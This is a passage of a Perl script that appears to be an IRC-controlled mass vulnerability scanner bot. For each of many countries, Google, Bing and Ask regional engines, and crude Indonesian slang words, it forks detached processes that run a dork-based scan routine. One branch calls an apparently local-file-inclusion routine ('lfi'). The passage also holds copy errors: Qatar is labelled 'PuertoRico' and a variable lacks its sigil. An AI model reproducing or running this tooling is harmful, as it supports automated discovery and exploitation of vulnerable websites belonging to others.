  526. if ($engine =~ /armenia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Armenia",$type,$nick); } exit; } }
  527. if ($engine =~ /azerbaijan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Azerbaijan",$type,$nick); } exit; } }
  528. if ($engine =~ /bahrain/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bahrain",$type,$nick); } exit; } }
  529. if ($engine =~ /bangladesh/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bangladesh",$type,$nick); } exit; } }
  530. if ($engine =~ /belarus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Belarus",$type,$nick); } exit; } }
  531. if ($engine =~ /bhutan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bhutan",$type,$nick); } exit; } }
  532. if ($engine =~ /bolivia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bolivia",$type,$nick); } exit; } }
  533. if ($engine =~ /bosnia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bosnia",$type,$nick); } exit; } }
  534. if ($engine =~ /bulgaria/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Bulgaria",$type,$nick); } exit; } }
  535. if ($engine =~ /brunei/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Brunei",$type,$nick); } exit; } }
  536. if ($engine =~ /cambodia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cambodia",$type,$nick); } exit; } }
  537. if ($engine =~ /cameroon/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cameroon",$type,$nick); } exit; } }
  538. if ($engine =~ /christmas/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Christmas",$type,$nick); } exit; } }
  539. if ($engine =~ /costarika/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"CostaRika",$type,$nick); } exit; } }
  540. if ($engine =~ /croatia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Croatia",$type,$nick); } exit; } }
  541. if ($engine =~ /cuba/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cuba",$type,$nick); } exit; } }
  542. if ($engine =~ /cyprus/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Cyprus",$type,$nick); } exit; } }
  543. if ($engine =~ /dominican/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Dominican",$type,$nick); } exit; } }
  544. if ($engine =~ /equador/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Equador",$type,$nick); } exit; } }
  545. if ($engine =~ /egypt/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Egypt",$type,$nick); } exit; } }
  546. if ($engine =~ /estonia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Estonia",$type,$nick); } exit; } }
  547. if ($engine =~ /finland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Finland",$type,$nick); } exit; } }
  548. if ($engine =~ /georgia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Georgia",$type,$nick); } exit; } }
  549. if ($engine =~ /ghana/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Ghana",$type,$nick); } exit; } }
  550. if ($engine =~ /grenada/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Grenada",$type,$nick); } exit; } }
  551. if ($engine =~ /honduras/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Honduras",$type,$nick); } exit; } }
  552. if ($engine =~ /hongkong/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Hongkong",$type,$nick); } exit; } }
  553. if ($engine =~ /iceland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Iceland",$type,$nick); } exit; } }
  554. if ($engine =~ /ireland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Ireland",$type,$nick); } exit; } }
  555. if ($engine =~ /kenya/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Kenya",$type,$nick); } exit; } }
  556. if ($engine =~ /kuwait/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Kuwait",$type,$nick); } exit; } }
  557. if ($engine =~ /laos/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Laos",$type,$nick); } exit; } }
  558. if ($engine =~ /latvia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Latvia",$type,$nick); } exit; } }
  559. if ($engine =~ /liberia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Liberia",$type,$nick); } exit; } }
  560. if ($engine =~ /libyan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Libyan",$type,$nick); } exit; } }
  561. if ($engine =~ /lithuania/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Lithuania",$type,$nick); } exit; } }
  562. if ($engine =~ /macedonia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Macedonia",$type,$nick); } exit; } }
  563. if ($engine =~ /malta/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Malta",$type,$nick); } exit; } }
  564. if ($engine =~ /mongolia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Mongolia",$type,$nick); } exit; } }
  565. if ($engine =~ /mozambique/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Mozambique",$type,$nick); } exit; } }
  566. if ($engine =~ /namibia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Namibia",$type,$nick); } exit; } }
  567. if ($engine =~ /nauru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Nauru",$type,$nick); } exit; } }
  568. if ($engine =~ /nepal/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Nepal",$type,$nick); } exit; } }
  569. if ($engine =~ /newzealand/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"NewZealand",$type,$nick); } exit; } }
  570. if ($engine =~ /nigeria/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Nigeria",$type,$nick); } exit; } }
  571. if ($engine =~ /paraguay/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Paraguay",$type,$nick); } exit; } }
  572. if ($engine =~ /peru/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Peru",$type,$nick); } exit; } }
  573. if ($engine =~ /portugal/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Portugal",$type,$nick); } exit; } }
  574. if ($engine =~ /puertorico/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PuertoRico",$type,$nick); } exit; } }
  575. if ($engine =~ /qatar/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PuertoRico",$type,$nick); } exit; } }
  576. if ($engine =~ /saintlucia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"SaintLucia",$type,$nick); } exit; } }
  577. if ($engine =~ /samoa/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Samoa",$type,$nick); } exit; } }
  578. if ($engine =~ /saudiarabia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &lfi($chan,$bug,dork,"SaudiArabia",$type,$nick); } exit; } }
  579. if ($engine =~ /senegal/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Senegal",$type,$nick); } exit; } }
  580. if ($engine =~ /slovakia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Slovakia",$type,$nick); } exit; } }
  581. if ($engine =~ /srilanka/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Srilanka",$type,$nick); } exit; } }
  582. if ($engine =~ /swaziland/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Swaziland",$type,$nick); } exit; } }
  583. if ($engine =~ /tajikistan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tajikistan",$type,$nick); } exit; } }
  584. if ($engine =~ /tanzania/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tanzania",$type,$nick); } exit; } }
  585. if ($engine =~ /tokelau/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tokelau",$type,$nick); } exit; } }
  586. if ($engine =~ /tonga/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tonga",$type,$nick); } exit; } }
  587. if ($engine =~ /tunisia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Tunisia",$type,$nick); } exit; } }
  588. if ($engine =~ /uruguay/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Uruguay",$type,$nick); } exit; } }
  589. if ($engine =~ /uzbekistan/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Uzbekistan",$type,$nick); } exit; } }
  590. if ($engine =~ /venezuela/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Venezuela",$type,$nick); } exit; } }
  591. if ($engine =~ /yemen/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yemen",$type,$nick); } exit; } }
  592. if ($engine =~ /yugoslavia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Yugoslavia",$type,$nick); } exit; } }
  593. if ($engine =~ /zambia/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Zambia",$type,$nick); } exit; } }
  594. if ($engine =~ /uganda/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Uganda",$type,$nick); } exit; } }
  595. if ($engine =~ /trinidad/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Trinidad",$type,$nick); } exit; } }
  596. if ($engine =~ /zimbabwe/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Zimbabwe",$type,$nick); } exit; } }
  597. if ($engine =~ /kontol/i) {
  598. if (my $pid = fork) { waitpid($pid, 0); }
  599. else { if (fork) { exit; } else {
  600. &type($chan,$bug,$dork,"KonToL",$type,$nick);
  601. } exit; }
  602. }
  603. if ($engine =~ /pepek/i) {
  604. if (my $pid = fork) { waitpid($pid, 0); }
  605. else { if (fork) { exit; } else {
  606. &type($chan,$bug,$dork,"PePek",$type,$nick);
  607. } exit; }
  608. }
  609. if ($engine =~ /tetek/i) {
  610. if (my $pid = fork) { waitpid($pid, 0); }
  611. else { if (fork) { exit; } else {
  612. &type($chan,$bug,$dork,"TeTek",$type,$nick);
  613. } exit; }
  614. }
  615. if ($engine =~ /itil/i) {
  616. if (my $pid = fork) { waitpid($pid, 0); }
  617. else { if (fork) { exit; } else {
  618. &type($chan,$bug,$dork,"ItiL",$type,$nick);
  619. } exit; }
  620. }
  621. if ($engine =~ /vagina/i) {
  622. if (my $pid = fork) { waitpid($pid, 0); }
  623. else { if (fork) { exit; } else {
  624. &type($chan,$bug,$dork,"Vagina",$type,$nick);
  625. } exit; }
  626. }
  627. if ($engine =~ /nennen/i) {
  628. if (my $pid = fork) { waitpid($pid, 0); }
  629. else { if (fork) { exit; } else {
  630. &type($chan,$bug,$dork,"NenNen",$type,$nick);
  631. } exit; }
  632. }
  633. if ($engine =~ /susu/i) {
  634. if (my $pid = fork) { waitpid($pid, 0); }
  635. else { if (fork) { exit; } else {
  636. &type($chan,$bug,$dork,"SuSu",$type,$nick);
  637. } exit; }
  638. }
  639. if ($engine =~ /buahdada/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BuahDada",$type,$nick); } exit; } }
  640. if ($engine =~ /payudara/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"PayuDara",$type,$nick); } exit; } }
  641. if ($engine =~ /kentot/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Kentot",$type,$nick); } exit; } }
  642. if ($engine =~ /memek/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"MeMek",$type,$nick); } exit; } }
  643. if ($engine =~ /emel/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"eMeL",$type,$nick); } exit; } }
  644. if ($engine =~ /oral/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"OraL",$type,$nick); } exit; } }
  645. if ($engine =~ /klitoris/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Klitoris",$type,$nick); } exit; } }
  646. if ($engine =~ /masturbasi/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Masturbasi",$type,$nick); } exit; } }
  647. if ($engine =~ /onani/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Onani",$type,$nick); } exit; } }
  648. if ($engine =~ /sperma/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Sperma",$type,$nick); } exit; } }
  649. if ($engine =~ /anal/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AnaL",$type,$nick); } exit; } }
  650. if ($engine =~ /puting/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Puting",$type,$nick); } exit; } }
  651. if ($engine =~ /penis/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"Penis",$type,$nick); } exit; } }
  652. if ($engine =~ /googleCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCA",$type,$nick); } exit; } }
  653. if ($engine =~ /googleDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeDE",$type,$nick); } exit; } }
  654. if ($engine =~ /googleUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeUK",$type,$nick); } exit; } }
  655. if ($engine =~ /googleFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeFR",$type,$nick); } exit; } }
  656. if ($engine =~ /googleES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeES",$type,$nick); } exit; } }
  657. if ($engine =~ /googleIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIT",$type,$nick); } exit; } }
  658. if ($engine =~ /googleNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeNL",$type,$nick); } exit; } }
  659. if ($engine =~ /googleBE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeBE",$type,$nick); } exit; } }
  660. if ($engine =~ /googleCH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCH",$type,$nick); } exit; } }
  661. if ($engine =~ /googleSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeSE",$type,$nick); } exit; } }
  662. if ($engine =~ /googleDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeDK",$type,$nick); } exit; } }
  663. if ($engine =~ /googleNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeNO",$type,$nick); } exit; } }
  664. if ($engine =~ /googleNZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeNZ",$type,$nick); } exit; } }
  665. if ($engine =~ /googleIE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIE",$type,$nick); } exit; } }
  666. if ($engine =~ /googleBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeBR",$type,$nick); } exit; } }
  667. if ($engine =~ /googleAR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeAR",$type,$nick); } exit; } }
  668. if ($engine =~ /googleCO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCO",$type,$nick); } exit; } }
  669. if ($engine =~ /googleCU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCU",$type,$nick); } exit; } }
  670. if ($engine =~ /googleCL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCL",$type,$nick); } exit; } }
  671. if ($engine =~ /googleMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeMX",$type,$nick); } exit; } }
  672. if ($engine =~ /googleAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeAU",$type,$nick); } exit; } }
  673. if ($engine =~ /googleRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeRU",$type,$nick); } exit; } }
  674. if ($engine =~ /googleAT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeAT",$type,$nick); } exit; } }
  675. if ($engine =~ /googlePL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLePL",$type,$nick); } exit; } }
  676. if ($engine =~ /googleIL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIL",$type,$nick); } exit; } }
  677. if ($engine =~ /googleTR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeTR",$type,$nick); } exit; } }
  678. if ($engine =~ /googleUA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeUA",$type,$nick); } exit; } }
  679. if ($engine =~ /googleGR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeGR",$type,$nick); } exit; } }
  680. if ($engine =~ /googleJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeJP",$type,$nick); } exit; } }
  681. if ($engine =~ /googleCN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeCN",$type,$nick); } exit; } }
  682. if ($engine =~ /googleMY/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeMY",$type,$nick); } exit; } }
  683. if ($engine =~ /googleTH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeTH",$type,$nick); } exit; } }
  684. if ($engine =~ /googleIN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeIN",$type,$nick); } exit; } }
  685. if ($engine =~ /googleKR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeKR",$type,$nick); } exit; } }
  686. if ($engine =~ /googleRO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeRO",$type,$nick); } exit; } }
  687. if ($engine =~ /googleTW/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeTW",$type,$nick); } exit; } }
  688. if ($engine =~ /googleZA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLeZA",$type,$nick); } exit; } }
  689. if ($engine =~ /googlePT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"GooGLePT",$type,$nick); } exit; } }
  690. if ($engine =~ /bingDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingDE",$type,$nick); } exit; } }
  691. if ($engine =~ /bingUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingUK",$type,$nick); } exit; } }
  692. if ($engine =~ /bingCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCA",$type,$nick); } exit; } }
  693. if ($engine =~ /bingBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingBR",$type,$nick); } exit; } }
  694. if ($engine =~ /bingFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingFR",$type,$nick); } exit; } }
  695. if ($engine =~ /bingES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingES",$type,$nick); } exit; } }
  696. if ($engine =~ /bingIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingIT",$type,$nick); } exit; } }
  697. if ($engine =~ /bingBE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingBE",$type,$nick); } exit; } }
  698. if ($engine =~ /bingNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingNL",$type,$nick); } exit; } }
  699. if ($engine =~ /bingPT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingPT",$type,$nick); } exit; } }
  700. if ($engine =~ /bingNO/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingNO",$type,$nick); } exit; } }
  701. if ($engine =~ /bingDK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingDK",$type,$nick); } exit; } }
  702. if ($engine =~ /bingSE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingSE",$type,$nick); } exit; } }
  703. if ($engine =~ /bingCH/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCH",$type,$nick); } exit; } }
  704. if ($engine =~ /bingNZ/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingNZ",$type,$nick); } exit; } }
  705. if ($engine =~ /bingRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingRU",$type,$nick); } exit; } }
  706. if ($engine =~ /bingJP/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingJP",$type,$nick); } exit; } }
  707. if ($engine =~ /bingCN/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCN",$type,$nick); } exit; } }
  708. if ($engine =~ /bingKR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingKR",$type,$nick); } exit; } }
  709. if ($engine =~ /bingMX/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingMX",$type,$nick); } exit; } }
  710. if ($engine =~ /bingAR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingAR",$type,$nick); } exit; } }
  711. if ($engine =~ /bingCL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingCL",$type,$nick); } exit; } }
  712. if ($engine =~ /bingAU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"BingAU",$type,$nick); } exit; } }
  713. if ($engine =~ /askCA/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKCA",$type,$nick); } exit; } }
  714. if ($engine =~ /askDE/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKDE",$type,$nick); } exit; } }
  715. if ($engine =~ /askIT/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKIT",$type,$nick); } exit; } }
  716. if ($engine =~ /askFR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKFR",$type,$nick); } exit; } }
  717. if ($engine =~ /askES/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKES",$type,$nick); } exit; } }
  718. if ($engine =~ /askRU/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKRU",$type,$nick); } exit; } }
  719. if ($engine =~ /askNL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKNL",$type,$nick); } exit; } }
  720. if ($engine =~ /askUK/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKUK",$type,$nick); } exit; } }
  721. if ($engine =~ /askBR/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKBR",$type,$nick); } exit; } }
  722. if ($engine =~ /askPL/i) { if (my $pid = fork) { waitpid($pid, 0); } else { if (fork) { exit; } else { &type($chan,$bug,$dork,"AsKPL",$type,$nick); } exit; } }
